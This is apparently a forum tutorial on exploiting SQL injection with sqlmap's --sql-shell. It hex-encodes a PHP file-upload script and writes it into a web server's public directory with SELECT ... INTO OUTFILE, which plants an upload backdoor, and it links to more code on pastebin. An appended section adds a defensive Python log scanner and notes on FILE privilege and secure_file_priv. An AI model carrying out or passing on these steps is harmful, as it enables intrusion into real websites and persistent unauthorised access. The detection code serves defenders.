1. First we need a target. Example, my target: http://www.example.com/index.php?id=1

2. Prepare your uploader script, as below.

PHP Code:

    <?php
    // Save the uploaded file into the script's own directory under its original name.
    $target_path = basename($_FILES['uploadedfile']['name']);
    if (move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
        echo basename($_FILES['uploadedfile']['name']) . " has been uploaded";
    } else {
        echo "Error!";
    }
    ?>

The script above must first be converted to hex before it can be uploaded.

Convert script to hex --> http://www.string-functions.com/string-hex.aspx

Next, open your CMD:

    C:\user\Security-Testers>cd c:\Sqlmap
    C:\Sqlmap>sqlmap.py -u http://www.example.com/index.php?id=1 --sql-shell

It will look something like this:

    [15:35:06] [INFO] the back-end DBMS is MySQL
    web server operating system: Windows
    web application technology: PHP 5.3.5, Apache 2.2.17
    back-end DBMS: MySQL 5
    [15:35:06] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
    sql-shell>

Now type:

    SELECT 0x'Hex' INTO OUTFILE "PATH/filename";

Do not forget to add '0x' in front of 'HEX':

    into "/home/siemens/public_html/upload.php";

Wait. If you are lucky, you will be notified that the upload succeeded; if not, try again. If it works, browse to the file created earlier, http://www.example.com/upload.php, and then upload your files.

Code: http://pastebin.com/JYcibww9
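Seen from the database side, the `SELECT 0x... INTO OUTFILE` statement above is an ordinary logged query. The following is an added example, not part of the original paste: it scans query-log lines and rates each file-writing statement. The log lines are constructed and assume a simplified tab-separated MySQL general query log layout; the function names are hypothetical.

```python
import re

# Constructed sample lines (timestamp, "<conn id> Query", statement), tab-separated.
# The layout is an assumption modelled on the MySQL general query log.
SAMPLE_LOG = (
    "2024-05-01T15:35:06Z\t   41 Query\tSELECT name FROM products WHERE id=1\n"
    "2024-05-01T15:35:09Z\t   41 Query\tSELECT 0x3c3f706870206563686f20313b203f3e"
    " INTO OUTFILE \"/home/siemens/public_html/upload.php\"\n"
    "2024-05-01T15:36:00Z\t   52 Query\tSELECT * FROM orders"
    " INTO OUTFILE '/var/backups/orders.csv'\n"
    "2024-05-01T15:36:30Z\t   41 Query\tselect 0x414243 into dumpfile '/tmp/a.bin'\n"
)

FILE_WRITE = re.compile(r"""INTO\s+(OUTFILE|DUMPFILE)\s+(['"])(.+?)\2""", re.I)
HEX_LITERAL = re.compile(r"\b0x([0-9a-f]+)", re.I)
SCRIPT_EXT = (".php", ".phtml", ".jsp", ".asp", ".aspx")


def decode_hex(literal):
    """Decode the digits of a 0x literal; odd-length input is left-padded with 0."""
    if len(literal) % 2:
        literal = "0" + literal
    return bytes.fromhex(literal)


def scan(log_text):
    """Return one finding per logged statement that writes a file."""
    findings = []
    for line in log_text.splitlines():
        parts = line.split("\t", 2)
        if len(parts) != 3 or not parts[1].strip().endswith("Query"):
            continue  # not a query record in the assumed layout
        ts, _, stmt = parts
        match = FILE_WRITE.search(stmt)
        if not match:
            continue
        dest = match.group(3)
        payloads = [decode_hex(h) for h in HEX_LITERAL.findall(stmt)]
        # High: the destination is a server-side script or the decoded bytes open a script tag.
        script = dest.lower().endswith(SCRIPT_EXT) or any(b"<?" in p for p in payloads)
        risk = "high" if script else "medium" if payloads else "low"
        findings.append({"time": ts, "dest": dest, "risk": risk})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

On the MySQL side, the write itself is blocked when the web application's database account lacks the `FILE` privilege or when `secure_file_priv` restricts export paths to a directory outside the web root.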